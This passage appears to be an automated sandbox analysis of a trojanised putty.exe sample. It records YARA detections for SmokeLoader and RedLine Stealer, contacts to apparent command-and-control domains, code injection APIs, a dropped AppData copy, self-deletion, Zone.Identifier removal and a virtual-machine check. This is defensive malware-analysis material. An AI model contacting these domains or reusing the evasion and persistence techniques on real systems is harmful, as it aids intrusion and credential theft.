                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2167378082.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000002.00000000.2161750223.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2167378082.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2167378082.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2167378082.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000002.00000000.2166756581.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2166091631.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2166717992.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: explorer.exe, 00000002.00000000.2170453754.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 00000002.00000000.2169811038.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000002.00000000.2164199732.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000002.00000000.2164199732.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000002.00000000.2162348523.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000002.00000000.2169811038.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: explorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                Source: explorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 4.3.hajefwb.890000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.880e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.putty.exe.950000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2110499167.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2388445359.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00402F8F RtlCreateUserThread,NtTerminateProcess,0_2_00402F8F
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004013BF
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00401412 NtAllocateVirtualMemory,0_2_00401412
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013CA NtAllocateVirtualMemory,0_2_004013CA
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014D3
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013D9 NtAllocateVirtualMemory,0_2_004013D9
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013E0 NtAllocateVirtualMemory,0_2_004013E0
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013F0 NtAllocateVirtualMemory,0_2_004013F0
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013F4 NtAllocateVirtualMemory,0_2_004013F4
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014F7
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014B5
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00402F8F RtlCreateUserThread,NtTerminateProcess,4_2_00402F8F
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004013BF
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00401412 NtAllocateVirtualMemory,4_2_00401412
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013CA NtAllocateVirtualMemory,4_2_004013CA
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014D3
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013D9 NtAllocateVirtualMemory,4_2_004013D9
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013E0 NtAllocateVirtualMemory,4_2_004013E0
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013F0 NtAllocateVirtualMemory,4_2_004013F0
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013F4 NtAllocateVirtualMemory,4_2_004013F4
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014F7
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014B5
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0041E7A00_2_0041E7A0
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00421B7C0_2_00421B7C
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004207230_2_00420723
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004201DF0_2_004201DF
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0041FC9B0_2_0041FC9B
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_0041E7A04_2_0041E7A0
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00421B7C4_2_00421B7C
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004207234_2_00420723
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004201DF4_2_004201DF
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_0041FC9B4_2_0041FC9B
                Source: putty.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@3/2
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084CB80 CreateToolhelp32Snapshot,Module32First,0_2_0084CB80
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hajefwbJump to behavior
                Source: putty.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\putty.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: putty.exeVirustotal: Detection: 37%
                Source: putty.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\putty.exe "C:\Users\user\Desktop\putty.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\hajefwb C:\Users\user\AppData\Roaming\hajefwb
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\hajefwb C:\Users\user\AppData\Roaming\hajefwb
                Source: C:\Users\user\Desktop\putty.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\putty.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\putty.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\putty.exeUnpacked PE file: 0.2.putty.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\hajefwbUnpacked PE file: 4.2.hajefwb.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00401068 push ebp; iretd 0_2_0040106E
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004010B4 push ss; ret 0_2_004010B5
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084D68A push ebp; iretd 0_2_0084D690
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084DDCA push es; iretd 0_2_0084DDCB
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084D6D6 push ss; ret 0_2_0084D6D7
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_008540EC push esi; retf 0_2_008540ED
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084F64C push ebx; ret 0_2_0084F652
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00851B62 push ds; ret 0_2_00851B75
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_009418DC push es; iretd 0_2_009418DD
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_009410CF push ebp; iretd 0_2_009410D5
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0094111B push ss; ret 0_2_0094111C
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00401068 push ebp; iretd 4_2_0040106E
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004010B4 push ss; ret 4_2_004010B5
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_008810CF push ebp; iretd 4_2_008810D5
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_008818DC push es; iretd 4_2_008818DD
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_0088111B push ss; ret 4_2_0088111C
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AB2BB4 push esi; retf 4_2_00AB2BB5
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAC19E push ss; ret 4_2_00AAC19F
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAC892 push es; iretd 4_2_00AAC893
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AB062A push ds; ret 4_2_00AB063D
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAE114 push ebx; ret 4_2_00AAE11A
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAC152 push ebp; iretd 4_2_00AAC158
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hajefwbJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hajefwbJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\putty.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hajefwb:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
